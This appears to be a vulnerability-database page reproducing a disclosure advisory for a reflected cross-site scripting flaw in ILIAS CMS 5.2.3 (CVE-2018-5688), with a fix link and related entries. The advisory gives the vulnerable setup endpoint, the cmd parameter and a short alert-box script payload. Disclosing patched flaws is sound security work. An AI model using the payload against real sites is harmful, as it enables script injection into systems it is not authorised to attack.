Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtFlorian Kunushevci1337DAY-ID-29492
HistoryJan 15, 2018 - 12:00 a.m.

ILIAS CMS 5.2.3 Cross Site Scripting Vulnerability

2018-01-1500:00:00
Florian Kunushevci
0day.today
57

0.003 Low

EPSS

Percentile

65.6%

JSON

Exploit for php platform in category web applications

# Exploit Title: Cross Site Scripting in ILIAS CMS 5.2.3
# Date: Apr 24, 2017
# Software Link: https://www.ilias.de
# Exploit Author: Florian Kunushevci
# Contact: https://facebook.com/florianx00
# CVE: CVE-2018-5688
# Category: webapps

1. Description

ILIAS before 5.2.4 has XSS via the cmd parameter to the displayHeader function in setup/classes/class.ilSetupGUI.php in the Setup component.

2. Proof of Concept

Location : /setup/setup.php
Parameter : ?cmd=
Payload : "><script>alert(1)</script>

3. Solution:

https://www.ilias.de/docu/goto.php?target=lm_1719&client_id=docu

4. References:

https://nvd.nist.gov/vuln/detail/CVE-2018-5688
https://www.ilias.de/docu/goto_docu_pg_75029_35.html

Thanks,

Best regards,
Florian Kunushevci

#  0day.today [2018-02-16]  #

Related

exploitpack 1
cve 1
cvelist 1
openvas 1
osv 1
nvd 1
prion 1
exploitdb 1
exploitpack
exploitpack
ILIAS 5.2.4 - Cross-Site Scripting
2018-01-15 00:00:00
cve
cve
CVE-2018-5688
2018-01-14 20:29:00
cvelist
cvelist
CVE-2018-5688
2018-01-14 20:00:00
openvas
openvas
ILIAS < 5.2.4 XSS Vulnerability
2018-01-16 00:00:00
osv
osv
CVE-2018-5688
2018-01-14 20:29:00
nvd
nvd
CVE-2018-5688
2018-01-14 20:29:00
prion
prion
Design/Logic Flaw
2018-01-14 20:29:00
exploitdb
exploitdb
ILIAS &lt; 5.2.4 - Cross-Site Scripting
2018-01-15 00:00:00

0.003 Low

EPSS

Percentile

65.6%

JSON
Related for 1337DAY-ID-29492
exploitpack1cve1cvelist1openvas1osv1nvd1prion1exploitdb1